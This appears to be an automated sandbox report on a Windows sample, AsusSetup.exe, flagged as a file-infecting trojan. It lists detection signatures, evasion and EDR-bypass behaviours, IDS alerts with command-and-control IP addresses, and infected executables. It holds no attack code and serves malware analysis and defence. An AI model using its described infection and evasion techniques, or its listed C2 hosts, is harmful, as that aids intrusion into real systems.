Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
AsusSetup.exe

Overview

General Information

Sample name:AsusSetup.exe
Analysis ID:1543957
MD5:13bf2819401d2f983fff90c1960831b8
SHA1:0b8058088b47edbcf963ac2ac7d5b23fa35e0e90
SHA256:7db9ca7dbe9a5724ef452585280e73a1a73563cc6a2559f2588d613454f70261
Tags:exeExpirouser-lschab
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
AI detected suspicious sample
Contains functionality to behave differently if execute on a Russian/Kazak computer
Creates files in the system32 config directory
Drops executable to a common third party application directory
Found direct / indirect Syscall (likely to bypass EDR)
Infects executable files (exe, dll, sys, html)
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries random domain names (often used to prevent blacklisting and sinkholes)
Binary contains a suspicious time stamp
Connects to many different domains
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Enables driver privileges
Enables security privileges
Executes massive DNS lookups (> 100)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Execution of Suspicious File Type Extension
Spawns drivers
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • AsusSetup.exe (PID: 5880 cmdline: "C:\Users\user\Desktop\AsusSetup.exe" MD5: 13BF2819401D2F983FFF90C1960831B8)
  • armsvc.exe (PID: 4308 cmdline: "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe" MD5: 828741995F05BE2FD6B071628F96F6B9)
  • alg.exe (PID: 2636 cmdline: C:\Windows\System32\alg.exe MD5: 332F38054E08BAEC551611993C8D1317)
  • AppVStrm.sys (PID: 4 cmdline: MD5: BDA55F89B69757320BC125FF1CB53B26)
  • AppvVemgr.sys (PID: 4 cmdline: MD5: E70EE9B57F8D771E2F4D6E6B535F6757)
  • AppvVfs.sys (PID: 4 cmdline: MD5: 2CBABD729D5E746B6BD8DC1B4B4DB1E1)
  • AppVClient.exe (PID: 3364 cmdline: C:\Windows\system32\AppVClient.exe MD5: 2148D94316FBFFE84543113C6A3C1FA4)
  • FXSSVC.exe (PID: 6972 cmdline: C:\Windows\system32\fxssvc.exe MD5: 5E3D1E384655DE6087F47BBB3A38FB17)
  • elevation_service.exe (PID: 7272 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe" MD5: 02A39F6A65834451980F9B1EE3EA62AA)
  • maintenanceservice.exe (PID: 7320 cmdline: "C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe" MD5: 8692348A40AAA0C027003BE9DA09E432)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

Sigma detected: Execution of Suspicious File Type Extension
Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: , CommandLine: , CommandLine|base64offset|contains: , Image: C:\Windows\System32\drivers\AppVStrm.sys, NewProcessName: C:\Windows\System32\drivers\AppVStrm.sys, OriginalFileName: C:\Windows\System32\drivers\AppVStrm.sys, ParentCommandLine: , ParentImage: , ParentProcessId: -1, ProcessCommandLine: , ProcessId: 4, ProcessName: AppVStrm.sys

Suricata Signatures

TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-10-28T16:52:07.869496+010020516541A Network Trojan was detected192.168.2.5551311.1.1.153UDP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-10-28T16:51:41.621440+010020516511A Network Trojan was detected192.168.2.5538261.1.1.153UDP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-10-28T16:52:01.565340+010020516531A Network Trojan was detected192.168.2.5530341.1.1.153UDP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-10-28T16:52:15.882417+010020516501A Network Trojan was detected192.168.2.5582351.1.1.153UDP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-10-28T16:52:38.611879+010020516521A Network Trojan was detected192.168.2.5607101.1.1.153UDP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-10-28T16:50:06.156760+010020516491A Network Trojan was detected192.168.2.5640981.1.1.153UDP
2024-10-28T16:52:55.922346+010020516491A Network Trojan was detected192.168.2.5618251.1.1.153UDP
2024-10-28T16:52:55.944670+010020516491A Network Trojan was detected192.168.2.5618251.1.1.153UDP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-10-28T16:50:04.596830+010020516481A Network Trojan was detected192.168.2.5620671.1.1.153UDP
2024-10-28T16:52:54.306362+010020516481A Network Trojan was detected192.168.2.5530171.1.1.153UDP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-10-28T16:50:00.848951+010020181411A Network Trojan was detected54.244.188.17780192.168.2.549705TCP
2024-10-28T16:50:02.388480+010020181411A Network Trojan was detected18.141.10.10780192.168.2.549707TCP
2024-10-28T16:50:04.593285+010020181411A Network Trojan was detected44.221.84.10580192.168.2.549711TCP
2024-10-28T16:50:43.727257+010020181411A Network Trojan was detected47.129.31.21280192.168.2.549919TCP
2024-10-28T16:50:45.659876+010020181411A Network Trojan was detected13.251.16.15080192.168.2.549930TCP
2024-10-28T16:50:51.190177+010020181411A Network Trojan was detected34.246.200.16080192.168.2.549966TCP
2024-10-28T16:50:52.166217+010020181411A Network Trojan was detected18.208.156.24880192.168.2.549975TCP
2024-10-28T16:50:58.470918+010020181411A Network Trojan was detected35.164.78.20080192.168.2.550002TCP
2024-10-28T16:50:59.362254+010020181411A Network Trojan was detected3.94.10.3480192.168.2.550003TCP
2024-10-28T16:51:04.096495+010020181411A Network Trojan was detected34.211.97.4580192.168.2.550006TCP
2024-10-28T16:51:12.188937+010020181411A Network Trojan was detected18.246.231.12080192.168.2.550012TCP
2024-10-28T16:51:26.049079+010020181411A Network Trojan was detected3.254.94.18580192.168.2.550023TCP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-10-28T16:50:00.848951+010020377711A Network Trojan was detected54.244.188.17780192.168.2.549705TCP
2024-10-28T16:50:02.388480+010020377711A Network Trojan was detected18.141.10.10780192.168.2.549707TCP
2024-10-28T16:50:04.593285+010020377711A Network Trojan was detected44.221.84.10580192.168.2.549711TCP
2024-10-28T16:50:43.727257+010020377711A Network Trojan was detected47.129.31.21280192.168.2.549919TCP
2024-10-28T16:50:45.659876+010020377711A Network Trojan was detected13.251.16.15080192.168.2.549930TCP
2024-10-28T16:50:51.190177+010020377711A Network Trojan was detected34.246.200.16080192.168.2.549966TCP
2024-10-28T16:50:52.166217+010020377711A Network Trojan was detected18.208.156.24880192.168.2.549975TCP
2024-10-28T16:50:58.470918+010020377711A Network Trojan was detected35.164.78.20080192.168.2.550002TCP
2024-10-28T16:50:59.362254+010020377711A Network Trojan was detected3.94.10.3480192.168.2.550003TCP
2024-10-28T16:51:04.096495+010020377711A Network Trojan was detected34.211.97.4580192.168.2.550006TCP
2024-10-28T16:51:12.188937+010020377711A Network Trojan was detected18.246.231.12080192.168.2.550012TCP
2024-10-28T16:51:26.049079+010020377711A Network Trojan was detected3.254.94.18580192.168.2.550023TCP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-10-28T16:50:03.407124+010028508511Malware Command and Control Activity Detected192.168.2.54970944.221.84.10580TCP
2024-10-28T16:51:12.183078+010028508511Malware Command and Control Activity Detected192.168.2.55001218.246.231.12080TCP
2024-10-28T16:52:12.523104+010028508511Malware Command and Control Activity Detected192.168.2.55006818.208.156.24880TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Antivirus / Scanner detection for submitted sample
Source: AsusSetup.exeAvira: detected
Antivirus detection for dropped file
Source: C:\Program Files (x86)\AutoIt3\Au3Check.exeAvira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exeAvira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exeAvira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeAvira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exeAvira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exeAvira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exeAvira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exeAvira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exeAvira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exeAvira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\Au3Info.exeAvira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exeAvira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exeAvira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exeAvira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exeAvira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeAvira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exeAvira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exeAvira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeAvira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exeAvira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exeAvira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exeAvira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.132\117.0.5938.132_chrome_installer.exeAvira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeAvira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exeAvira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeAvira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exeAvira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exeAvira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exeAvira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exeAvira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exeAvira: detection malicious, Label: W32/Infector.Gen
Multi AV Scanner detection for submitted file
Source: AsusSetup.exeReversingLabs: Detection: 73%
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.7% probability
Machine Learning detection for dropped file
Source: C:\Program Files (x86)\AutoIt3\Au3Check.exeJoe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exeJoe Sandbox ML: detected
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exeJoe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJoe Sandbox ML: detected
Source: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exeJoe Sandbox ML: detected
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exeJoe Sandbox ML: detected
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exeJoe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exeJoe Sandbox ML: detected
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exeJoe Sandbox ML: detected
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exeJoe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\Au3Info.exeJoe Sandbox ML: detected
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exeJoe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exeJoe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exeJoe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exeJoe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeJoe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exeJoe Sandbox ML: detected
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exeJoe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeJoe Sandbox ML: detected
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exeJoe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exeJoe Sandbox ML: detected
Source: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exeJoe Sandbox ML: detected
Source: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.132\117.0.5938.132_chrome_installer.exeJoe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJoe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exeJoe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJoe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exeJoe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exeJoe Sandbox ML: detected
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exeJoe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exeJoe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exeJoe Sandbox ML: detected
Machine Learning detection for sample
Source: AsusSetup.exeJoe Sandbox ML: detected
Source: Binary string: C:\work\p4\splinters\Splinters\S\BuildResults\bin\Win32\ReaderRelease\FullTrustNotifier\FullTrustNotifier.pdb77.GCTL source: alg.exe, 00000003.00000003.2441312172.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\DCB\CBT_Main\BuildResults\bin\Win32\Release\armsvc.pdb source: AsusSetup.exe, 00000000.00000003.2150436994.0000000003080000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: E:\PkgInstaller\base\ntsetup\SrvPack.Main\tools\sfxcab\sfxcab\objfre\i386\sfxcab.pdb source: alg.exe, 00000003.00000003.2497425619.0000000001450000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2490830927.0000000001540000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2489526924.0000000001530000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\ktab_objs\ktab.pdb source: ktab.exe.3.dr
Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcrobatInfo.pdb source: alg.exe, 00000003.00000003.2246078357.0000000001610000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release_x64\TextExtractor.pdb444 source: alg.exe, 00000003.00000003.2331276660.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release_x64\TextExtractor.pdb source: alg.exe, 00000003.00000003.2331276660.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: ADelRCP_Exec.pdb source: alg.exe, 00000003.00000003.2344856295.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: PresentationFontCache.pdb source: AsusSetup.exe, 00000000.00000003.2178500050.0000000002B00000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2204155544.00000000016B0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: mavinject32.pdbGCTL source: alg.exe, 00000003.00000003.2526934752.00000000016C0000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2530818713.00000000016C0000.00000004.00001000.00020000.00000000.sdmp, MavInject32.exe.3.dr
Source: Binary string: d:\dbs\el\omr\target\x86\ship\licensing\x-none\ospprearm.pdb source: OSPPREARM.EXE.3.dr
Source: Binary string: MicrosoftEdgeUpdateBroker_unsigned.pdb source: MicrosoftEdgeUpdateBroker.exe.3.dr
Source: Binary string: D:\GitSourceCode\AsTaskSched\Release\AsTaskSched.pdb source: AsusSetup.exe
Source: Binary string: crashreporter.pdb source: alg.exe, 00000003.00000003.2690809228.0000000001560000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: plugin-container.pdb source: alg.exe, 00000003.00000003.2861757838.00000000004C0000.00000004.00001000.00020000.00000000.sdmp, plugin-container.exe.3.dr
Source: Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdb source: alg.exe, 00000003.00000003.2307813796.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: F:\SourceCodeTB\SCD_AutoRunSource\AsusSetup\x64\Release\AsusSetup.pdb source: AsusSetup.exe
Source: Binary string: D:\T\BuildResults\bin\Release_x64\plug_ins\pi_brokers\MSRMSPIBroker.pdbAAAGCTL source: alg.exe, 00000003.00000003.2437526500.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\dbs\el\omr\Target\x64\ship\click2run\x-none\InspectorOfficeGadget.pdb source: alg.exe, 00000003.00000003.2517356706.00000000016C0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\Acrobat\Installers\ShowAppPickerForPDF\Release_x64\ShowAppPickerForPDF.pdb source: alg.exe, 00000003.00000003.2451910893.0000000001450000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2446761118.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: GoogleUpdateOnDemand_unsigned.pdb source: GoogleUpdateOnDemand.exe.3.dr
Source: Binary string: D:\T\BuildResults\bin\Release_x64\WCChromeNativeMessagingHost.pdb888 source: alg.exe, 00000003.00000003.2366770450.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\GitSourceCode\AsTaskSched\x64\Release\AsTaskSched.pdb source: AsusSetup.exe
Source: Binary string: Acrobat_SL.pdb((( source: alg.exe, 00000003.00000003.2253031986.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: pingsender.pdb source: alg.exe, 00000003.00000003.2834736372.0000000001450000.00000004.00001000.00020000.00000000.sdmp, pingsender.exe.3.dr
Source: Binary string: DiagnosticsHub.StandardCollector.Service.pdbGCTL source: AsusSetup.exe, 00000000.00000003.2170806600.0000000002B40000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: ADelRCP_Exec.pdbCC9 source: alg.exe, 00000003.00000003.2344856295.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcroBroker.pdb source: alg.exe, 00000003.00000003.2260700730.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: Acrobat_SL.pdb source: alg.exe, 00000003.00000003.2253031986.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: private_browsing.pdb source: alg.exe, 00000003.00000003.2881778104.0000000000470000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: E:\PkgInstaller\base\ntsetup\SrvPack.Main\tools\sfxcab\sfxcab\objfre\i386\sfxcab.pdbU source: alg.exe, 00000003.00000003.2497425619.0000000001450000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2490830927.0000000001540000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2489526924.0000000001530000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdbT source: alg.exe, 00000003.00000003.2307813796.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: C:\workspace\CR-Windows-x64-Client-Builder\x64\Release\CRWindowsClientService.pdbGG source: alg.exe, 00000003.00000003.2380164583.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcrobatInfo.pdb))) source: alg.exe, 00000003.00000003.2246078357.0000000001610000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: mavinject32.pdb source: alg.exe, 00000003.00000003.2526934752.00000000016C0000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2530818713.00000000016C0000.00000004.00001000.00020000.00000000.sdmp, MavInject32.exe.3.dr
Source: Binary string: msdtcexe.pdbGCTL source: AsusSetup.exe, 00000000.00000003.2202176160.0000000002B40000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: maintenanceservice.pdb source: AsusSetup.exe, 00000000.00000003.2191928065.0000000002B40000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2772620436.0000000001470000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: 64BitMAPIBroker.pdb source: alg.exe, 00000003.00000003.2419515500.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\dbs\el\omr\Target\x64\ship\click2run\x-none\InspectorOfficeGadget.pdbY source: alg.exe, 00000003.00000003.2517356706.00000000016C0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: firefox.pdb source: alg.exe, 00000003.00000003.2757514944.0000000000400000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: E:\jenkins\workspace\NGL_WORKFLOW\build\master\win64\Release\Acrobat\project\win\ngl-workflow\x64\Release (Acrobat)\adobe_licensing_wf_helper_acro.pdb source: alg.exe, 00000003.00000003.2407189666.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release_x64\WCChromeNativeMessagingHost.pdb source: alg.exe, 00000003.00000003.2366770450.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: firefox.pdbP source: alg.exe, 00000003.00000003.2757514944.0000000000400000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: C:\b\s\w\ir\cache\builder\src\out\Release_x64\setup.exe.pdb source: setup.exe1.3.dr
Source: Binary string: D:\T\BuildResults\bin\Release\Plug_ins\pi_brokers\32BitMAPIBroker.pdb@@ source: alg.exe, 00000003.00000003.2411283042.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: C:\work\p4\splinters\Splinters\S\BuildResults\bin\Win32\ReaderRelease\FullTrustNotifier\FullTrustNotifier.pdb source: alg.exe, 00000003.00000003.2441312172.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: private_browsing.pdbp source: alg.exe, 00000003.00000003.2881778104.0000000000470000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: C:\workspace\CR-Windows-x64-Client-Builder\x64\Release\CRWindowsClientService.pdb source: alg.exe, 00000003.00000003.2380164583.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\ktab_objs\ktab.pdb source: ktab.exe.3.dr
Source: Binary string: C:\b\s\w\ir\cache\builder\src\out\Release_x64\chrome_pwa_launcher.exe.pdb source: chrome_pwa_launcher.exe.3.dr
Source: Binary string: D:\T\BuildResults\bin\Release_x64\plug_ins\pi_brokers\MSRMSPIBroker.pdb source: alg.exe, 00000003.00000003.2437526500.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: maintenanceservice.pdb` source: AsusSetup.exe, 00000000.00000003.2191928065.0000000002B40000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2772620436.0000000001470000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\Acrobat\Installers\ShowAppPickerForPDF\Release_x64\ShowAppPickerForPDF.pdb$$ source: alg.exe, 00000003.00000003.2451910893.0000000001450000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2446761118.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release_x64\Eula.pdb source: alg.exe, 00000003.00000003.2385765536.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: ALG.pdb source: AsusSetup.exe, 00000000.00000003.2154306275.0000000002B00000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: minidump-analyzer.pdb source: alg.exe, 00000003.00000003.2814896754.0000000000400000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: C:\b\s\w\ir\cache\builder\src\out\Release_x64\chrome_proxy.exe.pdb source: alg.exe, 00000003.00000003.2678114905.0000000001490000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: msdtcexe.pdb source: AsusSetup.exe, 00000000.00000003.2202176160.0000000002B40000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: d:\dbs\el\omr\target\x86\ship\licensing\x-none\ospprearm.pdb00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000S source: OSPPREARM.EXE.3.dr
Source: Binary string: DiagnosticsHub.StandardCollector.Service.pdb source: AsusSetup.exe, 00000000.00000003.2170806600.0000000002B40000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: ALG.pdbGCTL source: AsusSetup.exe, 00000000.00000003.2154306275.0000000002B00000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: PresentationFontCache.pdbHt^t Pt_CorExeMainmscoree.dll source: AsusSetup.exe, 00000000.00000003.2178500050.0000000002B00000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2204155544.00000000016B0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcroBroker.pdbTTT source: alg.exe, 00000003.00000003.2260700730.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: default-browser-agent.pdb source: alg.exe, 00000003.00000003.2739562117.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: updater.pdb source: alg.exe, 00000003.00000003.2917096647.00000000004A0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: AppVShNotify.pdb source: alg.exe, 00000003.00000003.2513914889.00000000016C0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release\Plug_ins\pi_brokers\32BitMAPIBroker.pdb source: alg.exe, 00000003.00000003.2411283042.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\javaw_objs\javaw.pdb source: javaw.exe.3.dr
Source: Binary string: D:\T\BuildResults\bin\Release_x64\Eula.pdb888 source: alg.exe, 00000003.00000003.2385765536.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: AppVShNotify.pdbGCTL source: alg.exe, 00000003.00000003.2513914889.00000000016C0000.00000004.00001000.00020000.00000000.sdmp

Spreading

barindex
Infects executable files (exe, dll, sys, html)
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\chrome_pwa_launcher.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\chrmstp.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exeJump to behavior
